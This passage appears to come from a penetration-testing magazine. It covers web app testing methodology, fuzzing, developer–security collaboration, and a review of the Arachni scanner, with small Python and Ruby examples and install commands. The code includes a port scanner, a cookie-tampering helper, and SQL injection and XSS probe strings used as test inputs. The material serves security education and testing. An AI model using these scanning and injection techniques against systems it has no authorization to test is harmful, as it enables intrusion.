• Documentation – In this step, all the vulnerabilities discovered during the test are documented; evidence of exploitation and penetration testing findings are also recommended to be presented later within the final report.
• Improvement – The final step of the penetration test is to provide the corrective actions for closing the discovered vulnerabilities within the systems and the web applications.
Web Application Testing Tools
Throughout pen testing, a specific, structured methodology has to be followed, where the following steps might be used: Enumeration, Vulnerability Assessment, and Exploitation. Some of the tools that might be used within these steps are:
• Port Scanners
• Sniffers
• Proxy Servers
• Site Crawlers
• Manual Inspection
The output from the above tools allows the security team to gather information about the environment, such as open ports, services, versions, and operating systems. The vulnerability assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s), application server(s), database server(s), and any intermediary devices such as firewalls and load balancers. It is also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities; manual inspection of items such as HTTP responses, hidden fields, and HTML page sources should be part of the security assessment as well.
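Manual inspection of hidden fields is easy to support with a small helper. The sketch below, using Python's standard-library HTML parser, collects hidden inputs from a page; the example form is made up:

```python
from html.parser import HTMLParser

class HiddenFieldCollector(HTMLParser):
    """Collect hidden form fields -- a spot where applications often stash state."""
    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("type") == "hidden":
            self.fields[a.get("name")] = a.get("value")

def hidden_fields(page: str) -> dict:
    collector = HiddenFieldCollector()
    collector.feed(page)
    return collector.fields
```

Any value surfaced this way (prices, user IDs, state tokens) is a candidate for tampering tests in the next phase.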
Some of the areas that can be covered during the vulnerability assessment are the following:
• Input validation
• Access control
Figure 3: Testing techniques, procedures and steps
• Authentication and session management (session ID flaws) vulnerabilities
• Cross-site scripting (XSS) vulnerabilities
• Buffer overflows
• Injection flaws
• Error handling
• Insecure storage
• Denial of service (if required)
• Configuration management
• Business logic flaws
• SQL injection faults
• Cookie manipulation and poisoning
• Privilege escalation
• Command injection
• Client-side and header manipulation
• Unintended information disclosure
During the assessment, testing of the above vulnerabilities is performed, except for those that could cause denial of service conditions, which are usually discussed beforehand. Possible options for denial of service testing include testing during a specific time window, testing a development system, or manually verifying the condition that may be responsible for the vulnerability. Once the vulnerability assessment is complete, the final reports, recommendations and comments are summarized, and better solutions are suggested for the implementation process. Once the above assessments are done, the penetration test is half-way done, and the most important part of the assessment has to be delivered: the informative report that highlights all the risks found during the penetration phase.
The following are some of the commonly used tools for traditional penetration testing.
Port Scanners
Such tools are used to gather information about which network services are available for connection on each target host. A port scanning tool examines or queries each of the designated network ports or services on the target system. Most of these tools are able to scan both TCP and UDP ports. Another common feature of port scanners is their ability to determine the operating system type and its version number, since protocol implementations such as TCP/IP can vary in their specific responses. The configuration flexibility of port scanners serves to examine different port configurations as well as to hide from network intrusion detection mechanisms.
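The core of such a tool is simply a TCP connect() probe. The sketch below is a minimal illustration; real scanners add SYN scans, UDP probes, timing evasion, and OS fingerprinting:

```python
import socket

def scan_ports(host, ports, timeout=0.5):
    """Try a TCP connect() to each port; an accepted connection means the port is open."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 on success instead of raising an exception
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports
```

Only scan hosts you are authorized to test; even this simple connect scan is noisy and will show up in target logs.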
Vulnerability Scanners
While port scanners only produce an inventory of the types of available services, vulnerability scanners attempt to exercise vulnerabilities on their targeted systems. The main goal of vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts. These scanners work from a database of documented network service security defects, exercising each defect on each available service of the target hosts. Most commercial and open source scanners scan the operating system for known weaknesses and un-patched software, as well as configuration problems such as user permission management defects or problems with file access controls. Despite the fact that both network-based and host-based vulnerability scanners do little to help a web application-level penetration test, they are fundamental tools for any penetration testing. Good examples of such tools are Internet Scanner, QualysGuard, and Core Impact.
Application Scanners
Most application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against it. Popular commercial application scanners include AppScan and WebInspect.
Web Application Assessment Proxies
Assessment proxies work by interposing themselves between the web browser used by the testers and the target web server, where data can be viewed and manipulated. Such flexibility enables different tricks to exercise the application's weaknesses and its associated components. For example, penetration testers can view all cookies, hidden HTML fields, and other data used by the web application, and attempt to manipulate their values to trick the application.
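What such a proxy lets a tester do can be illustrated with a tiny header-tampering helper; the `role` cookie in the example is a hypothetical target, not a real application's:

```python
def tamper_cookie(headers: dict, name: str, new_value: str) -> dict:
    """Rewrite one cookie in a Cookie header, as an assessment proxy lets a tester do."""
    raw = headers.get("Cookie", "")
    cookies = dict(pair.split("=", 1) for pair in raw.split("; ") if "=" in pair)
    cookies[name] = new_value
    out = dict(headers)  # leave the original request untouched
    out["Cookie"] = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return out
```

If the application honors the tampered value (e.g. elevating `role=user` to `role=admin`), the tester has demonstrated a broken access control, which is exactly the class of finding proxies excel at.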
The above penetration testing practice is called black box testing. Some organizations use hybrid approaches, where traditional penetration testing is combined with some level of source code analysis of the web application. Most penetration testing tools can perform these penetration testing practices; however, choosing the right tool for the job is vital for the success of the penetration process and the accuracy of the results.
The following are some of the common features that should be implemented within penetration testing tools:
• Visibility – The tool must provide the required visibility for the testing team, which can be used as a feedback and reporting feature for the test results.
• Extensibility – The tool should be customizable, and it must provide scripting language or plug-in
capabilities that can be used to customize the penetration tests.
• Configurability – A tool that is configurable is highly recommended, to ensure the flexibility of the implementation process.
• Documentation – The tool should provide the right documentation, with a clear explanation of the probes performed during the penetration testing.
• License Flexibility – A tool that offers flexibility of use without specific constraints, such as a particular range of IP numbers or license limits, is a better tool than others.
Security Techniques for Web Apps
Some of the security techniques that can be implemented within a web application to eliminate vulnerabilities are:
• Sanitize the data coming from the browser – Any data sent by the browser can never be trusted (e.g. submitted form data, uploaded files, cookies, XML data, etc.). If web developers fail to sanitize the incoming data, it might lead to vulnerabilities such as SQL injection, cross-site scripting, and other attacks against the web application.
• Validate data before form submission and manage sessions – Cross-Site Request Forgery (CSRF) can occur when a web application accepts form submission data without verifying that it came from the user's web form. It is imperative for the web application to verify that the submitted form is the one that the web application had produced and served.
• Configure the server in the best possible way – Network administrators have to follow guidelines for hardening web servers. Some of these guidelines are: maintain and apply proper security patches, kill all redundant services and shut down unnecessary ports, confine access rights to folders and files, employ SSH (Secure Shell) rather than telnet or FTP, and install efficient anti-malware software.
In addition to the above guidelines, it is always important to enforce strong passwords for web application users and to handle stored passwords securely.
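The first guideline above, handling browser-supplied data safely, is most robustly addressed with parameterized queries. A minimal SQLite sketch (the table and the payload are made up) contrasts a vulnerable query with the safe variant:

```python
import sqlite3

def find_user_unsafe(conn, username):
    # VULNERABLE: string concatenation lets crafted input rewrite the query.
    return conn.execute(
        "SELECT id FROM users WHERE name = '" + username + "'").fetchall()

def find_user_safe(conn, username):
    # SAFE: the driver binds the value, so input stays data and never becomes SQL.
    return conn.execute(
        "SELECT id FROM users WHERE name = ?", (username,)).fetchall()
```

With a classic payload like `x' OR '1'='1`, the unsafe version returns every row, while the safe version simply finds no user with that literal name.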
Conclusion
A vulnerability assessment is the process of identifying, prioritizing, quantifying, and ranking the vulnerabilities in a system, where such a process determines if there are weaknesses or vulnerabilities in the system subjected to the assessment. Penetration testing includes all of the processes in a vulnerability assessment, plus the exploitation of vulnerabilities found in the discovery phase.
Unfortunately, an all-clear result from a penetration test does not mean that an application has no problems. Penetration tests can miss weaknesses such as session forging and brute-forcing detection, and as such, implementing security throughout an application's lifecycle is an imperative process for building secure web applications.
As automated web application security tools have matured in recent years, automated security assessments will continue, over time, to reduce both the uncertainty of determination (i.e. false positive results) and the potential to miss some issues (i.e. false negative results).
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications. Currently, automated tools cannot entirely replace manual penetration tests. However, if automated tools are used correctly, organizations can save a lot of money and time in finding a broad range of technical security vulnerabilities in web applications. Manual penetration testing can then be used to augment the automated results with the logical vulnerabilities that automated testing cannot find.
Finally, it is important to point out that over time, manual testing for technical vulnerabilities will move from difficult to impossible as the size, scope, and complexity of web applications increase. The fact that many enterprise organizations will not be able to dedicate the time, money, and effort required to assess thousands of web applications will increase the use of automated tools rather than relying on humans to test these applications manually. Moreover, relying on human effort to test for thousands of technical vulnerabilities within these applications is subject to human error and simply cannot be trusted.
BRYAN SOLIMAN
Bryan Soliman is a Senior Solution Designer currently working with the Ontario Provincial Government of Canada. He has over twenty years of Information Technology experience, with a Bachelor degree in Engineering, a Bachelor degree in Computer Science, and a Master degree in Computer Science.
WHAT IS A GOOD FUZZING TOOL?
Fuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software. It is based on sending anomalous (invalid or unexpected) data to the test target, the same method that is used by hackers and security researchers when they look for weaknesses to exploit. There are no false positives: if the anomalous data causes an abnormal reaction, such as a crash in the target software, then you have found a critical security flaw.
In this article, we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing.
PROPERTIES OF A GOOD FUZZING TOOL
There is an abundance of fuzzing tools available. How do you distinguish a good fuzzer? What are the qualities that a fuzzing tool should have?
Model-based test suites: Random fuzzing will certainly give you some results, but to really target the areas that are most at risk, the test cases need to be based on actual protocol models. This results in a huge improvement in test coverage and a reduction in test execution time.
Easy to use: Most fuzzers are built for security experts, but in QA you cannot expect that all testers understand what buffer overflows are. A fuzzing tool must come with all the security know-how built in, so that testers only need the domain expertise from the target system to execute tests.
Automated: Creating fuzz test cases manually is a time-consuming and difficult task. A good fuzzer will create test cases automatically. Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks.
Test coverage: Better test coverage means more discovered vulnerabilities. Fuzzer coverage must be measurable in two aspects: specification coverage and anomaly coverage.
Scalable: Time is almost always an issue when it comes to testing. The user must also have control over the fuzzing parameters, such as test coverage. In QA you rarely have much time for testing and therefore need to run tests fast. Sometimes you can use more time in testing and can select other test completion criteria.
Documented test cases: When a bug is found, it needs to be documented for your internal developers or for vulnerability management towards third-party developers. When there are billions of test cases, automated documentation is the only possible solution.
Remediation: All found issues must be reproduced in order to fix them. Network recording (PCAP) and automated reproduction packages help you deliver the exact test setup to the developers, so that they can start developing a fix for the found issues.
MOST COMMON MISTAKES IN FUZZING
Not maintaining proprietary test scripts: Proprietary test scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported.
Ticking off the fuzzing check-box: If the requirement for testers is to do fuzzing, they almost always choose the quick and dirty solution; this is almost always random fuzzing. Test requirements should focus on coverage metrics to ensure that testing aims to find the most flaws in software.
Using hardware test beds: Appliance-based fuzzing tools become outdated really fast, and the speed requirements for the hardware increase each year. Software-based fuzzers are scalable in performance, can easily travel with you where testing is needed, and are not locked to a physical test lab.
Unprepared for the cloud: A fixed location for fuzz testing makes it hard for people to collaborate and scale the tests. Be prepared for virtual setups, where you can easily copy the setup to your colleagues or upload it to cloud setups.
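To make the contrast with model-based fuzzing concrete, here is what the quick and dirty random-fuzzing baseline looks like in practice: a minimal Ruby sketch in which the anomaly set and the toy target parser are invented for illustration.

```ruby
# Minimal random-mutation fuzzer (illustrative sketch, not a product).
# It mutates a valid sample input and records any input that makes the
# target raise an exception -- each finding is a potential flaw.
ANOMALIES = ["\x00", 'A' * 4096, '%s%s%s', "'", '<script>']

def mutate(sample, rng)
  # insert one random anomaly at a random position in a valid sample
  sample.dup.insert(rng.rand(sample.length), ANOMALIES[rng.rand(ANOMALIES.length)])
end

# Stand-in test target: a toy parser that chokes on NUL bytes.
def parse(input)
  raise ArgumentError, 'unexpected NUL byte' if input.include?("\x00")
  input.split(',')
end

def fuzz(sample, iterations: 1000, seed: 42)
  rng = Random.new(seed)
  findings = []
  iterations.times do
    input = mutate(sample, rng)
    begin
      parse(input)
    rescue StandardError => e
      # document every failing input so the bug can be reproduced later
      findings << [e.class, input]
    end
  end
  findings
end

puts "#{fuzz('a,b,c').length} anomalous inputs triggered exceptions"
```

Note how blindly this works: most iterations exercise nothing interesting, which is exactly why the article argues for model-based test cases and coverage metrics instead.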
WEB APP SECURITY
Page 20-21 · http://pentestmag.com · 01/2011 (1) November
Developers are from Venus, Application Security guys are from Mars

We know that Application Security people talk a different language than developers do, whenever we publish a report, make an assessment, or review a software architecture from a security point of view. There is a gap between developers and the Application Security group. The two teams must interact with each other to reach the same goal of building secure code.

Application Security members are considered like the tax man asking for money: security is sometimes seen as a cost to pay in order to get an application into Production. Actually, it is a little of everyone's fault. Since Security people and Developers usually do not talk the same language, it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve.

Let's take a step back for a minute and let me clarify what I mean about language and communication. Consider this scenario. The Marketing department has asked for a brand new web portal that shows new products from the ACME corporation. Marketers usually do not know anything about technology, and they just want to hit the market with an aggressive campaign on the new product line. Marketers might ask the developers for something like the latest Web 2.0, Social-enabled website, or something like that, to impress the customers. Plus, they would like it as soon as possible, and they provide a deadline that the developers must keep.

The developers brainstorm the idea, write out some specifications and requirements, start prototyping their ideas, and eventually begin coding. They are under pressure to meet the deadline, and management usually presses even more to meet the proposed date. Security is slowly pushed aside so that the coding and production can meet the deadline. Most software architecture is not designed with security in mind, and in project Gantt Charts there usually are no security checkpoints included for code testing, nor time allowed for security fixes or remediation.

Developers are pushed to code the application so that they can meet the deadline. Acceptance tests and functionality tests are passed, and the application is almost ready for deployment when someone recalls something about security: Hey, we need to get this on-line, so we need to open up the firewall to allow access to it.

The Application Security group asks for additional information about the application and requests documentation of how the application was built. They do not see it from the developers' point of view of meeting the deadline that Management has imposed on them. On the other side, developers do not see the problem from a security perspective: what risks to the IT infrastructure will potentially be exposed if someone breaks into the new application?

One solution to the problem is to execute a penetration test on the application and look at the results. Then security is happy, since they can test the application, and developers are happy once the penetration test report is complete. Many times a Penetration Test report contains recommended mitigation steps that impose additional time constraints on the application delivery. Reports usually contain just the symptom, for example statements like a SQL injection is possible, not the real root cause: a parameter taken from a config file is not sanitized before utilization. The report does not contain all of the information necessary to solve the problems at first glance. The developers cannot mitigate all of the issues in time to meet the deadline, so many times bug fixes are prolonged or pushed into the next revision of the software, and in some cases they are never fixed. Another problem is when the two groups talk to each other at the end of the whole process using a non-common-ground language that further confuses or annoys everyone and pushes the groups further apart.

Communications Breakdown: You Give Me The Report
Penetration test reports are most of the time useless from the developers' point of view, because they do not give specific information with which developers can pinpoint where the problem is. This is very ironic, because the developers need to take full advantage of the security report, since most of the remediation consists of source code fixes.

Security issues found in penetration testing are not for the faint of heart. There can be a lot of high-level security issues, grouped by OWASP Top 10 (most of the time), with some generic remediation steps such as implement an input filtering policy. This information may not mean anything to a source code developer. They want to know the module, class or line where the problem exists, so that they can fix it. If provided enough time, developers can eventually determine where the problem exists, but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production.

Let's Close the Gap
What we need to do is define a common ground where security can be integrated into source code somewhat painlessly. Security should be transparent from the development team's point of view. This can be achieved by:

• Creating a development framework that has security built into it
• Designing an API to be used by the application

Putting security into the framework is the Rails approach. Rails' developers added a security facility inside the framework's helpers, so developers inherit the secure input filtering, SQL injection protection and the CSRF protection token. This is a huge step forward in assisting developers with this problem. This methodology works with a programming language that contains a secure framework for developing web applications. This is true for the Ruby community (other frameworks like Sinatra have some security facilities as well). With the Java programming language community, there are a lot of non-standardized frameworks available for Java developers, but which is the right one to use to ensure secure code development?

.NET has one single monolithic framework, and Microsoft has invested money in security; it seems they did it the right way, but it is not Open Source, so professionals cannot contribute. A generic framework-based solution is therefore not feasible. What about APIs? Developers do know how to use APIs, and having security controls embedded into a single library can save the day when writing source code. That is why OWASP introduced the ESAPI project: to provide a set of APIs that developers can use to embed security controls into their code. The requested effort is minimal compared to translating an implement a filter policy statement into running code, and you (as a security professional) now speak the same language as the developer. This is a win-win approach: the security team and the application developers are now on the same page, and everyone is happy.

There is a third approach, which I will cover in a follow-up article: the BDD approach. BDD is the acronym for Behavior Driven Development, which means that you start by writing test cases (taking examples from the Ruby on Rails world, you write test beds most of the time using rspec and cucumber) modeling how the source code has to behave according to the documentation or requirements specification. Initially, when you execute the test cases against your application, there will probably be failures that need to be corrected. The idea is straightforward. Using the WAPT activity, instead of an implement a filtering policy statement, you will produce a set of rspec/cucumber scenarios modeling how the source code must deal with malformed input. Then the development team starts correcting the code until it passes all of the test cases; when testing is complete and all tests pass, it will mean your source code has implemented the filtering policy. How has development changed? A new approach has been created to ensure that the developers implement your remediation statement. Now the developers understand how to handle malformed entry statements, and why they are so important to the Application Security group.

In the next article, we will see how to write some security tests using the BDD approach, in order to help a generic Java developer deal with cross-site scripting vulnerabilities.
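The BDD idea described in this article can be made concrete with a small sketch. The example below uses Minitest's spec style (bundled with Ruby) in place of RSpec/Cucumber, and the `sanitize` function is a hypothetical stand-in for the application code that must implement the report's filtering policy; the shape of the scenarios, not the naive filter itself, is the point.

```ruby
require 'minitest/autorun'

# Hypothetical stand-in for the application code that must implement
# the pen-test report's "input filtering policy" (invented for this example).
def sanitize(input)
  input.gsub(/[<>'";]/, '') # naive character filter, for illustration only
end

# Each spec-style example encodes one remediation requirement as behaviour,
# so the remediation statement becomes an executable test the developers
# can run until it passes.
describe 'input filtering policy' do
  it 'strips characters used to break out of SQL string literals' do
    _(sanitize("o'; DROP TABLE users --")).wont_include "'"
  end

  it 'strips angle brackets used to inject script tags' do
    _(sanitize('<script>alert(1)</script>')).wont_include '<'
  end

  it 'leaves benign input untouched' do
    _(sanitize('hello world')).must_equal 'hello world'
  end
end
```

The same three scenarios could be written as RSpec examples or Cucumber steps; what matters is that security and development now share one artifact that both sides can read and execute.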
PAOLO PEREGO
Paolo Perego is an application security specialist interested in fixing the code he just broke with a web application penetration test. He is interested in code review and is working on his own hybrid analysis tool called aurora. He loves Ruby on Rails, kernel hacking, playing guitar and practising Tae kwon-do ITF martial art. He's a husband, a daddy and a startup wannabe. You may want to check out Paolo's blog or look at his about.me page.
WEB APP VULNERABILITIES
Pulling the Legs of Arachni

Arachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos "Zapotek" Laskos. It got quite a good score for the detection of Cross-Site Scripting and SQL Injection issues in the recently publicised vulnerability scanner benchmark by Shay Chen.

Arachni is not a so-called inspection proxy, such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open Web Application Security Project (OWASP). Those tools are really meant to be used by a skilled consultant doing manual investigations of the application. Arachni can be better compared with commercial online scanners, which are pointed at the application and produce a report with no further interaction by the user.

Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and must choose the best combination of tools possible for the job at hand. Is Arachni worthwhile? Time for an in-depth review.

Under the Hood
According to the documentation, Arachni offers the following:

• Simplicity: everything is simple and straightforward, from a user's or component developer's point of view.
• A stable, efficient and high-performance framework: Arachni allows custom modules, reports and plug-ins. Developers can easily use the advanced framework features without knowing the nitty-gritty details.

Table 1: Overview of Audit and Reconnaissance modules included with Arachni

Audit Modules:
• SQL injection
• Blind SQL injection using rDiff analysis
• Blind SQL injection using timing attacks
• CSRF detection
• Code injection (PHP, Ruby, Python, JSP, ASP.NET)
• Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
• LDAP injection
• Path traversal
• Response splitting
• OS command injection (*nix, Windows)
• Blind OS command injection using timing attacks (*nix, Windows)
• Remote file inclusion
• Unvalidated redirects
• XPath injection
• Path XSS
• URI XSS
• XSS
• XSS in event attributes of HTML elements
• XSS in HTML tags
• XSS in HTML script tags

Recon Modules:
• Allowed HTTP methods
• Back-up files
• Common directories
• Common files
• HTTP PUT
• Insufficient Transport Layer Protection for password forms
• WebDAV detection
• HTTP TRACE detection
• Credit card number disclosure
• CVS/SVN user disclosure
• Private IP address disclosure
• Common backdoors
• .htaccess LIMIT misconfiguration
• Interesting responses
• HTML object grepper
• E-mail address disclosure
• US Social Security Number disclosure
• Forceful directory listing
We can vouch that both the simplicity and performance goals have been attained by Arachni. Since the framework is still under heavy development, stability is sometimes lacking, but at no time did this interfere with our vulnerability assessments.

Arachni is highly modular, both from an architecture point of view and from a source code point of view. The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan. The connection to these dispatchers can be secured with SSL encryption and certificate-based authentication. One dispatcher can handle multiple clients, and multiple dispatchers can share a load and communicate with each other to optimise and speed up the scanning process.

The asynchronous scanning engine supports both HTTP and HTTPS and has pause/resume functionality. Arachni supports upstream proxies (SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0) as well as proxy authentication. The scanner can authenticate against the web application using form-based authentication, HTTP Basic and Digest Authentication, and NTLM.

At the start of every scan, a crawler will try to detect all pages. In version 0.3 this was optional, but since version 0.4 the crawler is always run at the start of the scan. The crawler has filters for redundant pages, based on regular expressions and counters, and can include or exclude URLs based on regular expressions. Optionally, the crawler can also follow subdomains. There is also an adjustable link count and redirect limit.

The HTML parser can extract forms, links, cookies and headers. It can graciously handle badly written HTML thanks to a combination of regular expression analysis and the Nokogiri HTML parser.

Arachni offers a very simple and easy to use module API, enabling a developer to access helper audit methods and write custom modules in a matter of minutes. Arachni already includes a large number of modules: audit modules and reconnaissance (recon) modules. Table 1 provides an overview.

Arachni offers report management. The following reports can be created: standard output, HTML, XML, TXT, YAML serialization, and the Metareport, which provides Metasploit integration for automated and assisted exploitation.

Arachni has many built-in plug-ins that have direct access to the framework instance. Plug-ins can be used to add any functionality to Arachni. Table 2 provides an overview of the currently available plug-ins.

Table 2: Included Arachni plug-ins. Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni.

• Passive Proxy: analyses requests and responses between the web application and the browser, assisting in AJAX audits, logging in and/or restricting the scope of the audit.
• Form based AutoLogin: performs an automated login.
• Dictionary attacker: performs dictionary attacks against HTTP Authentication and Forms based authentication.
• Profiler: performs taint analysis with benign inputs and response time analysis.
• Cookie collector: keeps track of cookies while establishing a timeline of the changes.
• Healthmap: generates a sitemap showing the health (vulnerability present or not) of each crawled/audited URL.
• Content-types: logs content-types of server responses, aiding in the identification of interesting (possibly leaked) files.
• WAF (Web Application Firewall) Detector: establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes.
• MetaModules: loads and runs high-level meta-analysis modules pre/mid/post-scan:
  • AutoThrottle: dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization.
  • TimeoutNotice: provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with. It also points out the danger of DoS (Denial-of-Service) attacks against pages that perform heavy-duty processing.
  • Uniformity: reports inputs that are uniformly vulnerable across a number of pages, hinting at the lack of a central point of input sanitization.

Installation
Arachni consists of client-side (web or shell) and server-side functionality (the dispatchers). A client talks to one or more dispatchers that will perform the scanning job. New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid). This is great if you want to speed up the scan, or if you want to execute some crazy things like running your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers.

Let's get our hands dirty and start with the experimental branch (currently at version 0.4), so we can work with the latest and greatest functionality. Another benefit is that this experimental version can work under Windows.

Installation under Linux is quick and easy, but a Windows set-up requires the installation of Cygwin first. Cygwin is a collection of tools that provide a Linux-like environment on Windows, as well as a large part of the Linux APIs. Another possibility is to run Arachni natively on Windows using MinGW (Minimalist GNU for Windows), but at this moment there are too many problems involved with that.

Linux
Installation under Linux is quite straightforward. Open your favourite shell and execute the commands in Listing 1. This will install all source directories in your home directory; change the cd commands if you want the sources somewhere else. In case you need an update to the latest versions, just cd into the three directories above and perform:
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni. If you encounter a Typhoeus-related error while running Arachni, issue:
$ gem clean
Windows
Arachni comes with decent documentation, but I had a chuckle when I read the installation instructions for Windows: Windows users should run Arachni in Cygwin. I knew that this was not going to be a smooth ride. Since v0.3 some changes have been made to the experimental version to make it easier, so here we go.
Please note that these installation instructions start with the installation of Cygwin and all required dependencies.
Install or upgrade Cygwin by running setup.exe. Apart from the standard packages, include the following:

• Database: libsqlite3-devel, libsqlite3_0
• Devel: doxygen, libffi4, gcc4, gcc4-core, gcc4-g++, git, libxml2, libxml2-devel, make, openssl-devel
• Editors: nano
• Libs: libxslt, libxslt-devel, libopenssl098, tcltk, libxml2, libmpfr4
• Net: libcurl-devel, libcurl4
Listing 1: Installation for Linux

$ sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2: Installation for Windows

$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Accept the installation of packages that are required to satisfy dependencies. Note that some of your other tools might not work with these libraries or upgrades; in any case, an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier.
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand. First we need to install libffi. Execute the following commands in your Cygwin shell:
$ cd
$ git clone http://github.com/atgreen/libffi.git
$ cd libffi
$ ./configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml. Download the latest stable version of libyaml (currently 0.1.4) from http://pyyaml.org/wiki/LibYAML and move it to your Cygwin home folder (probably C:\cygwin\home\your_windows_id). Execute the following:
$ cd
$ tar xvf yaml-0.1.4.tar.gz
$ cd yaml-0.1.4
$ ./configure
$ make
$ make install
Now we need to compile and install Ruby. Download the latest stable release of Ruby (currently ruby-1.9.2-p290.tar.gz) from http://www.ruby-lang.org and move it to your Cygwin home folder. Execute the following commands in the Cygwin shell:
$ cd
$ tar xvf ruby-1.9.2-p290.tar.gz
$ cd ruby-1.9.2-p290
$ ./configure
$ make
$ make install
From your Cygwin shell, update and install some necessary modules:

$ gem update --system
$ gem install rake-compiler
$ cd
$ git clone http://github.com/djberg96/sys-proctable.git
$ cd sys-proctable
$ gem build sys-proctable.gemspec
$ gem install sys-proctable-0.9.1-x86-cygwin.gem
Finally, we can install Arachni (and the source) by executing the commands of Listing 2 in the Cygwin shell (note that these are the same commands as for the Linux installation).
In case of weird error messages regarding fork during compilation (especially on Vista systems), execute the following in your Cygwin shell:
$ find /usr/local -iname '*.so' > /tmp/localso.lst
Quit all Cygwin shells. Use Windows to browse to C:\cygwin\bin. Right-click ash.exe and choose Run as administrator. Enter in ash:

$ /bin/rebaseall
$ /bin/rebaseall -T /tmp/localso.lst
Exit ash
Light my Fire
How to fire up Arachni depends on whether you want to use it with the new (since version 0.3) web GUI or simply run everything through the command-line interface. Note that the current web GUI does not support all functionality that is available from the command line.
The GUI can be started by executing the following commands
$ arachni_rpcd &
$ arachni_web
After that, browse to http://localhost:4567 and admire the new GUI. You will need to attach the GUI to one or more dispatchers; the dispatcher(s) will run the actual scan.
Figure 1 Edit Dispatchers
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1):

• Start a Scan: start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of which issues are detected and how far along the process is.
• Modules: enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site Scripting (XSS), SQL Injection (SQLi) and Cross-Site Request Forgery (CSRF), detect hidden features, or simply make lists of interesting items such as e-mail addresses.
• Plugins: plug-ins help to automate tasks. Plug-ins are more powerful than modules and make it possible to script login sequences, detect Web Application Firewalls (WAF), perform dictionary attacks, and more.
• Settings: the settings screens allow you to add cookies and headers, limit the scan to certain directories, and more.
• Reports: gives access to the scan reports. Arachni creates reports in its own internal format and exports them to HTML, XML or text.
• Add-ons: three add-ons are installed:
  • Auto-deploy: converts any SSH-enabled Linux box into an Arachni dispatcher
  • Tutorial: serves as an example
  • Scheduler: schedules and runs scan jobs at a specific time
• Log: overview of actions taken by the GUI
Your First Scan
We will use both the command line and the GUI. First the command line: start a scan with all modules active. This is extremely easy:

$ arachni http://www.example.com --report=afr:outfile=www.example.com.afr
Afterwards, the HTML report can be created by executing the following:

$ arachni --repload=www.example.com.afr --report=html:outfile=www.example.com.html
That's it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:
$ arachni --help
Usually it is not necessary to include all recon modules. Some modules will create a lot of requests, making detection of your activities easier (if that is a problem for your assignment) and taking a lot more time to finish. List all modules with the following command:
$ arachni --lsmod
Enabling or disabling modules is easy: use the --mods switch followed by a regular expression to include modules, or exclude modules by prefixing the regular expression with a dash. Example:

$ arachni --mods=*,-xss_* http://www.example.com

The above will load all modules except the modules related to Cross-Site Scripting (XSS).
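The include/exclude matching can be pictured with a few lines of Ruby. This is an illustrative sketch of the idea only, not Arachni's actual implementation; the function name and behaviour are assumptions made for this example.

```ruby
# Illustrative sketch of wildcard-based module selection in the spirit
# of the --mods switch (assumed behaviour, not Arachni source code).
def select_modules(available, patterns)
  # patterns starting with '-' are exclusions, the rest are inclusions
  include_pats, exclude_pats = patterns.partition { |p| !p.start_with?('-') }
  selected = available.select { |mod| include_pats.any? { |p| File.fnmatch(p, mod) } }
  selected.reject do |mod|
    exclude_pats.any? { |p| File.fnmatch(p.sub(/\A-/, ''), mod) }
  end
end

mods = %w[xss_path xss_uri sqli csrf]
select_modules(mods, ['*', '-xss_*']) # => ["sqli", "csrf"]
```

Here the wildcard * pulls in everything and -xss_* then drops the XSS-related modules, mirroring the command line above.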
